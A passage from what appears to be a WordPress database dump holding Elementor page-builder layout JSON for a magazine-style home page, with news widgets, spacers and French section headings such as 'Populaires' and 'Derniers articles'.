d\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Derniers articles\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1381,482,'_elementor_version','0.4'),(1382,483,'_elementor_edit_mode','builder'),(1383,483,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"3